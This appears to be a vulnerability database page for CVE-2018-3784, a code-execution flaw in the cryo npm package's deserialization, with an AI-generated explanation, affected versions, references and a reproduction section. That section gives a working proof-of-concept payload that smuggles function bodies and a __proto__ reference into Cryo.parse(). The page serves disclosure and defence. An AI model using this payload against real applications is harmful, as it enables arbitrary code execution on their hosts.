CVE-2018-3784
Description
Cryo 0.0.6 is vulnerable to arbitrary code execution via insecure deserialization, allowing an attacker to execute arbitrary JavaScript functions.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Cryo 0.0.6 is vulnerable to arbitrary code execution via insecure deserialization, allowing an attacker to execute arbitrary JavaScript functions.
Vulnerability
Cryo version 0.0.6 and earlier are vulnerable to a code injection vulnerability due to an insecure implementation of deserialization [1][2]. The library's parse function does not properly sanitize serialized data, allowing an attacker to inject arbitrary JavaScript functions into the deserialized object.
Exploitation
An attacker can craft a malicious serialized JSON payload containing references to JavaScript functions. When Cryo.parse() is called on this payload, the functions are evaluated and executed [2]. No authentication or special privileges are required; the only prerequisite is that an application uses cryo to deserialize untrusted input.
Impact
Successful exploitation leads to arbitrary code execution within the context of the application [1][2]. The attacker gains the ability to execute arbitrary JavaScript, potentially leading to complete compromise of the host system, data exfiltration, or further attacks.
Mitigation
As of the last available advisories, no fix has been released for cryo [2]. Users are strongly recommended to avoid using cryo with untrusted data and to consider switching to an alternative module that provides secure deserialization [2]. The vulnerability is considered critical with a CVSS score of 9.8 [1].
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
cryonpm | <= 0.0.6 | — |
Affected products
2- Range: Not fixed
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Insecure deserialization implementation in cryo allows arbitrary code execution by embedding function definitions within serialized data."
Attack vector
An attacker crafts a JSON payload containing `_CRYO_FUNCTION_` markers that embed arbitrary JavaScript function bodies [ref_id=1]. The cryo library's `parse()` method evaluates these function strings during deserialization without sanitization [CWE-94]. The proof-of-concept payload uses `_CRYO_REF_` pointers to construct an object whose `__proto__` references a function, achieving code execution when the hydrated object is used [ref_id=1]. No authentication or special network access is required — the attacker only needs to supply the malicious serialized string to `Cryo.parse()`.
Affected code
The advisory does not specify exact file paths or function names within the cryo package. The vulnerability exists in the `Cryo.parse()` method, which deserializes JSON strings containing `_CRYO_FUNCTION_` markers by evaluating the embedded function bodies as live JavaScript code [ref_id=1].
What the fix does
No fix is currently available for cryo [ref_id=1]. The advisory recommends using an alternative module until a fix is made available [ref_id=1]. The root cause — evaluating untrusted strings as JavaScript functions during deserialization — would require the library to either disallow function serialization entirely or safely sandbox the evaluation, but no patch has been published.
Preconditions
- inputThe attacker must be able to supply a malicious serialized string to the Cryo.parse() method.
Reproduction
```javascript var Cryo = require('cryo'); var frozen = '{"root":"_CRYO_REF_3","references":[{"contents":{},"value":"_CRYO_FUNCTION_function () {console.log(\"defconrussia\"); return 1111;}"},{"contents":{},"value":"_CRYO_FUNCTION_function () {console.log(\"defconrussia\");return 2222;}"},{"contents":{"toString":"_CRYO_REF_0","valueOf":"_CRYO_REF_1"},"value":"_CRYO_OBJECT_"},{"contents":{"__proto__":"_CRYO_REF_2"},"value":"_CRYO_OBJECT_"}]}' var hydrated = Cryo.parse(frozen); console.log(hydrated); ```
Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4- github.com/advisories/GHSA-38f5-ghc2-fcmvghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2018-3784ghsaADVISORY
- hackerone.com/reports/350418ghsax_refsource_MISCWEB
- www.npmjs.com/advisories/690ghsaWEB
News mentions
0No linked articles in our index yet.